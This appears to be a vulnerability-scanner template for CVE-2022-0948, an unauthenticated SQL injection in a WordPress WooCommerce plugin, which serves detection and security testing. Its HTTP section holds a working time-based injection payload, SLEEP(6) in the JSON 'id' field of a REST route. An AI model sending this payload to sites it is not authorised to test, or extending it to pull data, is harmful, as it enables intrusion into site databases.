id: CVE-2022-0948 info: name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection author: theamanrawat severity: critical description: | WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 - https://wordpress.org/plugins/woc-order-alert/ - https://plugins.trac.wordpress.org/changeset/2707223 - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0948 cwe-id: CWE-89 epss-score: 0.04066 cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 verified: true framework: wordpress vendor: pluginbazaar product: order_listener_for_woocommerce tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin http: - raw: - | @timeout: 15s POST /?rest_route=/olistener/new HTTP/1.1 Host: {{Hostname}} content-type: application/json {"id":" (SLEEP(6))#"} - | GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - 'duration_1>=6' - 'status_code_1 == 200' - 'contains(content_type_1, "application/json")' - 'contains(body_2, "olistener-action.olistener-controller")' condition: and